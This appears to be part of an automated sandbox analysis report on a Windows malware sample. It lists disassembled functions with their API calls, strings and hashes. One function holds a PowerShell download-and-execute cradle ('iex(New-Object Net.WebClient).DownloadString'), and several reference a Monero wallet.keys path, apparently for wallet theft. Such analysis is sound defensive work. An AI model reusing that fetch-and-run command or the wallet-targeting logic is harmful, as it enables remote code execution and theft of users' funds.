CreateFileA.KERNEL32(:7,80000000,00000003,00000000,00000003,00000080,00000000,?,00373AEE,?), ref: 003792FC
GetFileSizeEx.KERNEL32(000000FF,:7), ref: 00379319
CloseHandle.KERNEL32(000000FF), ref: 00379327

Strings

:7, xrefs: 003792F8, 003792FB
:7, xrefs: 00379311, 0037933D, 00379314

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: :7$:7
API String ID: 1378416451-1131387469
Opcode ID: 22869047f39c7f3b03b153ed455f8d2a49488e5c76bf5a643531d4e94ea83fca
Instruction ID: 23ece5336a4d44c078aabcdb224d63babef2867b9d129350a0ecaa9ae05d6631
Opcode Fuzzy Hash: 22869047f39c7f3b03b153ed455f8d2a49488e5c76bf5a643531d4e94ea83fca
Instruction Fuzzy Hash: C2F03C39E40208BBEB20DBB0DC49BAE77B9EB58750F11C254B655A72D0E7789605DB40

Function 0037C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

memset.MSVCRT ref: 0037C8BF
___crtGetStringTypeA.LIBCMT ref: 0037C8EC
___crtLCMapStringA.LIBCMT ref: 0037C90C
___crtLCMapStringA.LIBCMT ref: 0037C931

Strings

, xrefs: 0037C896

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Typememset
String ID:
API String ID: 3530896902-3916222277
Opcode ID: 6983250885f4e5b6a065d44490fa935620e9843074ee51791b01c7f134568ade
Instruction ID: 9488e247100ee04ccf23f8293d24120a975f690a57048e4445886b005935772a
Opcode Fuzzy Hash: 6983250885f4e5b6a065d44490fa935620e9843074ee51791b01c7f134568ade
Instruction Fuzzy Hash: BB41E4B15107985EDB328B248C84BFBBBEC9F46704F1494ECEA8E96182D3759A448F20

Function 00372C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

ShellExecuteEx.SHELL32(0000003C), ref: 00372D85

Strings

<, xrefs: 00372D39
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00372D04
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00372CC4
')", xrefs: 00372CB3

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: 6555b1561ce140ef2af1bc45f6a5e5916558544fdb3235b37ab2f6ef3300669b
Instruction ID: ad0635880636ab928d9a59fd2fbbac38e96aaa7b38d231603718a07154c86945
Opcode Fuzzy Hash: 6555b1561ce140ef2af1bc45f6a5e5916558544fdb3235b37ab2f6ef3300669b
Instruction Fuzzy Hash: D141D671C1060C9ADB66FFA0C851FDEBB74AF54300F408159F11A6A191DF78664ADF92

Function 00369E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00369F41

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Strings

v20, xrefs: 00369E21
v10, xrefs: 00369EA3
ERROR_RUN_EXTRACTOR, xrefs: 00369E67
@, xrefs: 00369EF1

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 4171519190-1096346117
Opcode ID: 41232f670ec57aca5ee58907c40b0e49a3a7df88ce24cb9b99368c5e25f72d53
Instruction ID: 0c9f2ecf469e41164a6c2fa75b51135db655bbf2c3898e7f19bccbfadbc48480
Opcode Fuzzy Hash: 41232f670ec57aca5ee58907c40b0e49a3a7df88ce24cb9b99368c5e25f72d53
Instruction Fuzzy Hash: EE613371A10648EBDB29EFA4CC95FED7779AF85304F00C018F90A5F195DB746A05CB52

Function 00379260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(0114E3D8,?,?,?,0037140C,?,0114E3D8,00000000), ref: 0037926C
lstrcpyn.KERNEL32(005AAB88,0114E3D8,0114E3D8,?,0037140C,?,0114E3D8), ref: 00379290
lstrlen.KERNEL32(?,?,0037140C,?,0114E3D8), ref: 003792A7
wsprintfA.USER32 ref: 003792C7

Strings

%s%s, xrefs: 003792B5

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: cc20262ab5c33973755527c83b66b8bf473f0d001b31332b21e4314e828db895
Instruction ID: 05f1ffe3a85ea274f1a72d1c75c6d83f50ab8694927817d365b464d47ec30d41
Opcode Fuzzy Hash: cc20262ab5c33973755527c83b66b8bf473f0d001b31332b21e4314e828db895
Instruction Fuzzy Hash: 0C01A57550020CFFCB04DFE8C988EAE7BB9EB59354F108548F9099B205C735AA44DBA1

Function 00376630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00376663

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

ShellExecuteEx.SHELL32(0000003C), ref: 00376726
ExitProcess.KERNEL32 ref: 00376755

Strings

<, xrefs: 003766D9

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: aff5a036ee9706b34ba468bae2758a58f3605457965a0254cf5787e364606816
Instruction ID: fb884c14fcbed8c89f088da6ba5ff42c5ebe790f6419f1655c18a8de853b049a
Opcode Fuzzy Hash: aff5a036ee9706b34ba468bae2758a58f3605457965a0254cf5787e364606816
Instruction Fuzzy Hash: EF3161B1C01208ABDB65EB90DC85FDE7778AF54300F408198F3196A191DF786B49CF5A

Function 003787C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00380E28,00000000,?), ref: 0037882F
RtlAllocateHeap.NTDLL(00000000), ref: 00378836
wsprintfA.USER32 ref: 00378850

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Strings

%dx%d, xrefs: 00378847

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: 53ae80f6c2c530088af66d9552ec916e811ce314eed658a6d070c38814ee9bec
Instruction ID: 0f48c7166b9d196731b6c0b4a8821af18315cc4586f82cba1df221af4f7ff191
Opcode Fuzzy Hash: 53ae80f6c2c530088af66d9552ec916e811ce314eed658a6d070c38814ee9bec
Instruction Fuzzy Hash: 52213DB1A40208AFDB14DF94DD49FAEBBB8FB49B01F104119F605A7280C77DA904DBA1

Function 00378D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0037951E,00000000), ref: 00378D5B
RtlAllocateHeap.NTDLL(00000000), ref: 00378D62
wsprintfW.USER32 ref: 00378D78

Strings

%hs, xrefs: 00378D6F

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
